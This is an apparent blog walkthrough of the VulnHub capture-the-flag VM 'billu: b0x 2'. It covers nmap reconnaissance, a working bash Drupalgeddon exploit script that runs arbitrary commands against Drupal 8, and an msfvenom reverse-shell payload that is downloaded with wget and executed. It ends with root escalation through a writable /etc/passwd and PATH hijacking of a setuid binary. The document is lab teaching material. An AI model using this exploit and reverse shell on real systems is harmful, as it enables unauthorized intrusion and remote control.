This post documents the complete walkthrough of billu: b0x 2, a boot2root VM created by Manish Kishan Tanwar, and hosted at VulnHub. If you are uncomfortable with spoilers, please stop reading now.

Background

Try this if you want an OSCP refresher that’s not too difficult.

Information Gathering

Let’s start with a nmap scan to establish the available services in the host.

# nmap -n -v -Pn -p- -A --reason -oN nmap.txt 192.168.30.129
...
PORT      STATE SERVICE REASON         VERSION
22/tcp    open  ssh     syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 e6:3e:0d:ca:5c:3e:57:f8:1d:e6:e6:c5:3b:b3:67:b5 (DSA)
|   2048 ee:ef:3e:03:3a:24:f8:9f:35:4f:3a:9a:6f:64:a5:f5 (RSA)
|   256 af:60:d8:cb:90:08:63:4b:d3:7b:04:d3:7c:db:cf:bf (ECDSA)
|_  256 c0:56:96:d2:62:52:ea:9f:7f:d8:2a:7a:6b:1b:bd:56 (ED25519)
80/tcp    open  http    syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Drupal 8 (https://www.drupal.org)
| http-methods:
|_  Supported Methods: GET POST HEAD OPTIONS
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/
| /comment/reply/ /filter/tips/ /node/add/ /search/ /user/register/
| /user/password/ /user/login/ /user/logout/ /index.php/admin/
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Home | --==[[ Billu b0x 2 - with love from indishell Lab ]]==--
111/tcp   open  rpcbind syn-ack ttl 64 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          42940/udp  status
|_  100024  1          45103/tcp  status
8080/tcp  open  http    syn-ack ttl 64 Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|   Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_  Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
45103/tcp open  status  syn-ack ttl 64 1 (RPC #100024)

nmap finds a couple of open ports. Nothing unusual. Let’s take a look at the web-related ones. The metadata in the HTML source tells me I’m looking at a Drupal 8 installation.

9cbbd925.png

Drupalgeddon

Suffice to say, the first thought that comes to my mind is Drupalgeddon. Since this is Drupal 8, I’ll give EDB-ID 44448 a shot. It’s a proof-of-concept code written in Python that tests for remote command execution. It writes a file and then checks for the file’s existence. In any case, it’s easy to rewrite it in bash. i.e. wrap the script around curl and re-purpose it to take in an argument—any shell command.

exploit.sh
#!/bin/bash

RHOST=192.168.30.129
URL="http://$RHOST/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
CMD=$1

STATUS=$(curl -s \
              -o /dev/null \
              -w %{http_code} \
              --data-urlencode "form_id=user_register_form" \
              --data-urlencode "_drupal_ajax=1" \
              --data-urlencode "mail[#post_render][]=exec" \
              --data-urlencode "mail[#type]=markup" \
              --data-urlencode "mail[#markup]=$CMD" \
              $URL)

if [ $STATUS -eq 200 ]; then
  echo "[+] Exploit Successful"
else
  echo "[!] Exploit Failed"
fi

Time to run my exploit script.

On my exploit script terminal

1bc5fcfa.png

On my nc listener

95bbd761.png

You can see the remote command executed successfully.

Next, I’ll make use of wget to transfer a reverse shell (generated by msfvenom), make it executable with chmod, and then execute it.

You can generate the reverse shell with msfvenom like so.

# msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.30.128 LPORT=1234 -f elf -o rev
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 68 bytes
Final size of elf file: 152 bytes
Saved as: rev

On my exploit script terminal

cd2272c1.png

On my SimpleHTTPServer terminal

743c9c3d.png

On my nc listener

0e917b2f.png

I got shell.

Privilege Escalation

Long story short. Once you have a low-privilege shell, there are two ways to gain root privileges.

Method 1: world-writable /etc/passwd

How do you know /etc/passwd is world-writable? Simple.

07134282.png

So what if /etc/passwd is world-writable? What can you do with it? Enough to be dangerous.

2a7227b9.png

su to toor. Password is toor.

1a61b268.png

Method 2: /opt/s is setuid to root

How do you know /opt/s is setuid to root? Simple.

6ce80208.png

Check out the strings in the executable. This is classic—hijacking the default executable search path.

d7faf243.png

scp is not specified in absolute path. We can easily trick the shell to search for a PATH we specified first. Heck, we don’t even have to compile any code. Any shell script that start with #! will suffice, as long as it’s called scp.

5d60d36e.png

:dancer:

Afterthought

A good way to kill time.